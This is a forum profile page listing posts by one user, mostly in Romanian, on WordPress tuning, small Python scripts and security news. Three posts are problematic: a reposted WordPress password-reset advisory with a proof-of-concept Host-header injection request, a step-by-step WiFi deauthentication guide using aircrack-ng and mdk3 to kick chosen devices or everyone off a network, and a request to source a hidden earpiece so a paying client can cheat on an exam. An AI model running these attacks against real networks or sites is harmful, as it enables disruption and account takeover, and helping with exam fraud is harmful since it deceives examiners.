Jump to content

sharkyz

Active Members
  • Content Count

    592
  • Joined

  • Last visited

Community Reputation

56 Excellent

About sharkyz

  • Rank
    Registered user

Converted

  • Biography
    You can't write your own biography, no one would believe you!
  • Location
    Thinking...
  • Interests
    Learning, Making memories, Having fun, Helping People, Making Money, Alcolol, Making Money, Booze
  • Occupation
    Consuming large amount of alcohol while making Friends and learning things

Recent Profile Visitors

1255 profile views
  1. Washington (CNN): Two Romanian hackers infiltrated nearly two-thirds of the outdoor surveillance cameras in Washington, DC, as part of an extortion scheme, according to federal court documents. In a criminal complaint filed last week in the US District Court for the District of Columbia, the US government alleges that the two Romanian hackers operating outside the United States infiltrated 65% of the outdoor surveillance cameras operated by DC city police — that's 123 cameras out of 187 in the city. The alleged hacking occurred during a four-day period in early January. The hacking suspects, Mihai Alexandru Isvanca and Eveline Cismaru, are also accused of using the computers behind the surveillance cameras to distribute ransomware through spam emails, according to an affidavit by Secret Service agent James Graham in support of the government's criminal complaint. The affidavit alleges the hackers meant to use the malware to lock victims' computers and then extort payments from them to regain access. In the affidavit, the Romanians are accused of "intent to extort from persons money and other things of value, to transmit in interstate and foreign commerce communications containing threats to cause damage to protected computers." They were traced through their registered email addresses, one of which roughly translates into "selling souls" in Romanian, according to the affidavit. http://edition.cnn.com/2017/12/20/politics/romanian-hackers-dc-cameras/index.html
  2. Update: Am reusit sa mai scad putin din loading time la prima vizita folosind cloudflare ca dns in loc de route53 de la amazon, in plus edge caching suna destul de atractiv si pentru vizite din afara europei. Dar tot sunt dejamagit ca nu vrea sa serveasca direct fisierele precompresate cea ce ridica ttfb cu vreo 50-60 de ms la fiecare request pentru ca sta sa recompreseze cea ce ii da serverul. Compresia lor la gzip este de 3 sau 4 si nu au brottli.
  3. ==================================================== - Discovered by: Dawid Golunski (@dawid_golunski) - dawid[at]legalhackers.com - https://legalhackers.com - ExploitBox.io (@Exploit_Box) - CVE-2017-8295 - Release date: 03.05.2017 - Revision 1.0 - Severity: Medium/High ============================================= I. VULNERABILITY ------------------------- WordPress Core <= 4.7.4 Potential Unauthorized Password Reset (0day) II. BACKGROUND ------------------------- "WordPress is a free and open-source content management system (CMS) based on PHP and MySQL. WordPress was used by more than 27.5% of the top 10 million websites as of February 2017. WordPress is reportedly the most popular website management or blogging system in use on the Web, supporting more than 60 million websites." https://en.wikipedia.org/wiki/WordPress III. INTRODUCTION ------------------------- Wordpress has a password reset feature that contains a vulnerability which might in some cases allow attackers to get hold of the password reset link without previous authentication. Such attack could lead to an attacker gaining unauthorised access to a victim's WordPress account. IV. DESCRIPTION ------------------------- The vulnerability stems from WordPress using untrusted data by default when creating a password reset e-mail that is supposed to be delivered only to the e-mail associated with the owner's account. This can be observed in the following code snippet that creates a From email header before calling a PHP mail() function: ------[ wp-includes/pluggable.php ]------ ... if ( !isset( $from_email ) ) { // Get the site domain and get rid of www. $sitename = strtolower( $_SERVER['SERVER_NAME'] ); if ( substr( $sitename, 0, 4 ) == 'www.' ) { $sitename = substr( $sitename, 4 ); } $from_email = 'wordpress@' . $sitename; } ... ----------------------------------------- As we can see, Wordpress is using SERVER_NAME variable to get the hostname of the server in order to create a From/Return-Path header of the outgoing password reset email. However, major web servers such as Apache by default set the SERVER_NAME variable using the hostname supplied by the client (within the HTTP_HOST header): https://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname Because SERVER_NAME can be modified, an attacker could set it to an arbitrary domain of his choice e.g: attackers-mxserver.com which would result in Wordpress setting the $from_email to wordpress@attackers-mxserver.com and thus result in an outgoing email with From/Return-Path set to this malicious address. As to which e-mail header the attacker would be able to modify - From or Return-Path, it depends on the server environment. As can be read on http://php.net/manual/en/function.mail.php The From header sets also Return-Path under Windows. Depending on the configuration of the mail server, it may result in an email that gets sent to the victim WordPress user with such malicious From/Return-Path address set in the email headers. This could possibly allow the attacker to intercept the email containing the password reset link in some cases requiring user interaction as well as without user interaction. Some example scenarios include: * If attacker knows the email address of the victim user. They can perform a prior DoS attack on the victim's email account (e.g by sending multiple large files to exceed user's disk quota, or attacking the DNS server) in order to cause the password reset email to be rejected by the receiving server, or not reach the destination and thus get returned to the account on attacker's server * Some autoresponders might attach a copy of the email sent in the body of the auto-replied message * Sending multiple password reset emails to force the user to reply to the message to enquiry explanation for endless password reset emails. The reply containing the password link would then be sent to attacker. etc. V. PROOF OF CONCEPT ------------------------- If an attacker sends a request similar to the one below to a default Wordpress installation that is accessible by the IP address (IP-based vhost): -----[ HTTP Request ]---- POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1 Host: injected-attackers-mxserver.com Content-Type: application/x-www-form-urlencoded Content-Length: 56 user_login=admin&redirect_to=&wp-submit=Get+New+Password ------------------------ Wordpress will trigger the password reset function for the admin user account. Because of the modified HOST header, the SERVER_NAME will be set to the hostname of attacker's choice. As a result, Wordpress will pass the following headers and email body to the /usr/bin/sendmail wrapper: ------[ resulting e-mail ]----- Subject: [CompanyX WP] Password Reset Return-Path: <wordpress@attackers-mxserver.com> From: WordPress <wordpress@attackers-mxserver.com> Message-ID: <e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com> X-Priority: 3 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Someone requested that the password be reset for the following account: http://companyX-wp/wp/wordpress/ Username: admin If this was a mistake, just ignore this email and nothing will happen. To reset your password, visit the following address: <http://companyX-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin> ------------------------------- As we can see, fields Return-Path, From, and Message-ID, all have the attacker's domain set. The verification of the headers can be performed by replacing /usr/sbin/sendmail with a bash script of: #!/bin/bash cat > /tmp/outgoing-email VI. BUSINESS IMPACT ------------------------- Upon a successfull exploitation, attacker may be able to reset user's password and gain unauthorized access to their WordPress account. VII. SYSTEMS AFFECTED ------------------------- All WordPress versions up to the latest 4.7.4 VIII. SOLUTION ------------------------- No official solution available. As a temporary solution users can enable UseCanonicalName to enforce static SERVER_NAME value https://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname This issue was first reported to WordPress security team multiple times, with the first report sent in July 2016. As there has been no progress in this case , this advisory is finally released to the public without an official patch. IX. REFERENCES ------------------------- https://legalhackers.com https://ExploitBox.io Vendor site: https://wordpress.org http://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname http://php.net/manual/en/function.mail.php https://tools.ietf.org/html/rfc5321 X. CREDITS ------------------------- Discovered by Dawid Golunski dawid (at) legalhackers (dot) com https://legalhackers.com https://ExploitBox.io Thanks to BeyondSecurity for help with contacting the vendor. XI. REVISION HISTORY ------------------------- 03.05.2017 - Advisory released, rev. 1 XII. EXPLOITBOX - A PLAYGROUND FOR HACKERS ------------------------- ExploitBox.io is coming soon. Subscribe at https://ExploitBox.io to stay updated and be there for the launch. XIII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.
  4. @QuoVadis Deja folosesc h2o care după câteva teste mia dat că este ~43% mai rapid decât nginx pentru static files. Am deja php-7.1, opcache, apcu și Wordpress object caching pe apcu. Setarea ondemand pentru php-fpm limitează resursele folosite (RAM) sacrificând performanță. O să mă documentez mai mult despre wp_options și my.cnf pentru mysql. Mulțumesc @n3curatu Nu folosesc nginx, momentan încerc să scriu câteva scripturi care sa se ocupe de html, css, js minifying. In orice caz o să mă uit prin opțiunile de la pagespeed să văd ce pot rescrie (fura). Mersi că mi-ai adus aminte. @Sim Master Da, folosesc php7.1, nu exclud pe viitor să mă transfer pe hhvm, o să fac niste benchmark-uri pe viitor că să găsesc cele mai bune metode de optimizare Wordpress. M-am apucat de el acum câteva luni, încă nu imi place php (deși mă gândesc să iau un job pe php) sau Wordpress-ul dar face freelancingul atât de rapid încât nici nu mă gândesc la a folosi altceva.
  5. @tjt Plugin, Teme, Server, Versiune PHP, Extensii PHP. Chiar si compilare pe server (dureaza ceva) @u0m3 Shiet. Multumesc. voi inlocui din nou diseara polyfill cu modernizr, pariez ca cel mai mult a durat stalled sau ceva legat de DNS/SSL (sau nu esti in europa).
  6. Lucrez de ceva timp in a optimiza wordpress-ul pentru a putea fii tinut pe cel mai mic server posibil si in acelasi timp sa ofere performante bune 24/7. Am reusit sa ajung la 240 de mb ram cu alpinelinux, ultima versiune live pe https://www.privilegiul.ro/. M-ar interesa in special durata de la DOMContentLoaded* si Total Load time* asa ca daca ati lasa un comment cu astea as fi recunoscator. *In chrome apasati CTRL-SHIFT-N -> F12 -> tastati adresa si enter (jos vedeti durata incarcarii). *In firefox CTRL-SHIFT-P -> F12 -> tastati adresa si enter -> network tab -> liniuta albastra (dom content loaded) si cea rosie load time. Daca aveti recomandari pentru site in afara de performanta, tehnic in legatura cu (design, categorii...etc) nu ezitati. Vom incepe cu continut fresh in curand (facultate, servici).
  7. Este asa de stresat ca imi imaginez ca nici nu se uita la pret.
  8. Salut, Am un client care in cateva zile va avea un test (ceva de genu bac) si mi-a cerut sa il ajut sa treaca pentru o mica suma de bani. Singura idee cu care am venit ar fi mini earpiece. Am gasit cateva earpieceuri pe amazon si ebay dar unele au reviewuri foarte proaste asa ca ma intreb daca a avut cineva de aici experienta cu asa ceva si daca imi poate recomanda un dispozitiv. Singurele cerinte sunt sa se auda decent, sa fie complet ascuns si sa fie conectat prin telefon (il voi apela din alta tara). Ce am gasit: http://www.amazon.com/COOMAX-Earphone-Wireless-Microphone-Detection/dp/B00ZX29CUE http://www.ebay.com/itm/Spy-Earpiece-Bluetooth-Loop-Invisible-Micro-Earphone-Mini-Wireless-Covert-Hidden-/141660230099 http://www.ebay.com/itm/Spy-Earpiece-Invisible-GSM-Hidden-Wireless-Covert-Earphone-Bluetooth-Nano-Bug-/121627337478 ? http://www.ebay.com/itm/Spy-Earpiece-Invisible-GSM-Bluetooth-Box-Hidden-Micro-Wireless-Earphone-Covert-/281265461445 Echipamentul va vi procurat de el asa ca nu ma intereseaza pretul, poate vinde cineva dintre voi? EDIT: Clientul a dat deja comanda pentru urmatorul produs care mi se pare ca este prea scump http://www.spycheatstuff.com/index.php?page=shop.product_details&product_id=33&option=com_virtuemart&Itemid=55&lang=en Voi comanda si eu inca unul sa ma asigur ca va merge macar unul dintre ele.
  9. La asta http://null-byte.wonderhowto.com/? Orce informatie este folositoare daca este filtrata corespunzator... ...mai pierdut la "merita sa-ti petreci timpul p-acolo" Ce vrei sa inveti? La ce nivel esti? Nu se pune problema daca merita din moment ce nu sacrifici nimic.
  10. http://en.business.skyscanner.net/en-gb/products/travel-apis/ http://support.wan.travel/hc/en-us/articles/200191669-Wego-Flights-API https://developer.flightstats.com/api-docs/airlines/v1 Daca nu merge asa mai este o solutie: web scraping
  11. @Webz Il aveam in gists. Este unul dintre cele mai performante. Incearca cu un 1.000.000 la metoda simpla si metoda tricky. Pe laptopul meu differenta este: fib 0.0944411754608 sec moloz 13.828804969800 sec
  12. Am avut nevoie sa gasesc repede link-uri directe la aproape 50 de carti dupa amazon asa ca am scris 10 linii de cod si gata. Requirements: Python 2.7 pip install google googlesearch.py from google import search from time import sleep import sys def direct_search(title, ext, multi='off'): print title sleep(2) for url in search(title + ' ' + ext, stop=10): if (url.endswith('.pdf')): print url if (multi == 'off'): break if __name__ == "__main__": if (len(sys.argv) < 4): print 'usage: ./%s file.txt format multi=\'on/off\'' % sys.argv[0] print 'ex. : ./%s book-titles.txt pdf off' % sys.argv[0] else: with open(sys.argv[1], 'r') as file: for line in file: line = line.rstrip() links = direct_search(line, sys.argv[2], sys.argv[3]) if not line: continue file.close() Se foloseste in urmatorul fel: Creati un fisier si puneti in el numele de la carti listate unu sub celalt in urmatorul fel: fisier.txt Test-Driven Development with Python Fluent Python 1st Edition Foundations of Python Network Programming 3rd edition Python Network Programming Cookbook Si apoi rulati applicatia cu: ./googlesearch.py fisier.txt mp4 off daca vreti sa salvati linkurile intrun fisier: ./googlesearch.py fisier.txt mp4 off > urls.txt In caz ca nu va da rezultate incercati sa schimbati stop cu o valuare mai mare de 40.
  13. def fib(n): v1, v2, v3 = 1, 1, 0 for rec in bin(n)[3:]: calc = v2*v2 v1, v2, v3 = v1*v1+calc, (v1+v3)*v2, calc+v3*v3 if rec=='1': v1, v2, v3 = v1+v2, v1, v2 return v2
  14. Pentru performanta probabil iterativ , in unele cazuri un algoritm recursiv este convertit in format iterativ de compiler.
  15. Requirements: OS: Linux Wireless card with support for: injection and monitor mode. Packages: aircrack-ng (http://www.aircrack-ng.org/) mdk3 (http://aspj.aircrack-ng.org/) (You should be able to find these in your repos.) Its possible to do this with just aircrack-ng but I prefer mdk3 for the actual deauthing. If you know your system skip the first steps. 1. First thing we need to do is see if your wireless card supports injection and monitor mode. For the sake of this tip we will call your wireless device wlan0. If you need to know what yours is type this command. ifconfig -a Now look for the wlan# that you want to use. Most people will only have one unless your like me and use two wireless cards. 2. Take your card down with this command ifconfig wlan0 down For testing injection type this: aireplay-ng -9 wlan0 You should get something back that says "Injection is working!" 3. Now to test if your card support monitor mode. We first need the physical name of the wireless card. For this run. airmon-ng Identify your card on the list and look for the phy# 4. Once you have it run this but replace phy0 with yours. iw phy phy0 info |grep -A8 modes Under supported interface modes it should have "monitor" listed. So if everything’s cool lets move on. If not you may need newer drivers or a different wireless card. I recommend the Alfa USB WiFi AWUS036H. Now we are ready to have some fun. 5. You need to get some info about your access point to proceed. So at this point disconnect from your network and lets get to it.Use this command to get info about your access point. airodump-ng wlan0 This should start packet capturing all wireless traffic. Once you see yours hit Ctrl+C to cancel the capture. Take note of your essid, mac address, and channel. 6. Once you have it lets take a closer look at who is on line with the same command but a little different. A.) Bring your network card back up with this command. ifconfig wlan0 up B.) change your channel with iwconfig like this. My channel is 6. Make sure you use the channel you got earlier. iwconfig wlan0 channel 6 C.)Bring your wireless card back down. ifconfig wlan0 down D.) Now its time to find out who's on line. Run this command below. airodump-ng -c 6 --bssid {mac address for access point} wlan0 -c is for the channel number --bssid is for your mac address on your access point.If you want to store the captured packets just add the -w option with the location you want to store the capture files. This would look like this airodump-ng -c 6 --bssid {mac address for access point} -w {path and name of file} wlan0 Once airodump-ng starts running if you see something on the end of the top line that says something like stuck on channel -1 then you suffered from the same bug I did. To fix it hit Ctrl+C and run these two commands and then start over on step a. airmon-ng stop mon0 airmon-ng stop wlan0 If you don't see that error then your good. Now kick back and watch the stations appear. Each system on the network will show up at the bottom as they use the wireless. You can cross reference the first three MAC segments xx:xx:xx on line to see the manufacturer until you find your pray. For me it was my daughters Kindle Fire. Once you see the device you want to kick off the network write down the mac address and hit Ctrl+C to stop the packet capture. Now finally for the moment of truth. Which family member do you have in your sites. Once you pick one run this command. echo "xx:xx:xx:xx:xx:xx" > ./black.lst Replace the "xx" with the mac address of the victim. This creates a list of mac addresses you want to kick. If you want to add more then one change the > to >>. The final command. mdk3 wlan0 d -n {essid} -b ./black.lst replace {essid} with the essid of the access point. That's it. As long as the command runs they will be kicked off line. Unless they spoof there mac address or use another access point. This also works well for neighbors that your wife gives the pass-phrase out to. You can take this a step further and kick everyone off the access point with this command. mdk3 wlan0 d -n {essid} By just leaving out the black list you will kick off everyone on that access point. To stop the attack just hit Ctrl+C to kill the command and everyone will be able to connect again. Have fun and remember its cool to play with your own equipment but don't cause trouble for other people. That's not nice. ;-) sharkyz: If I have time tomorrow I'll update with a bash or python script to do all this. (If you know your system and wireless card you just need the packages and the last commands) source: http://www.thelinuxgeek.com/content/linux-tip-wireless-deauthing
×
×
  • Create New...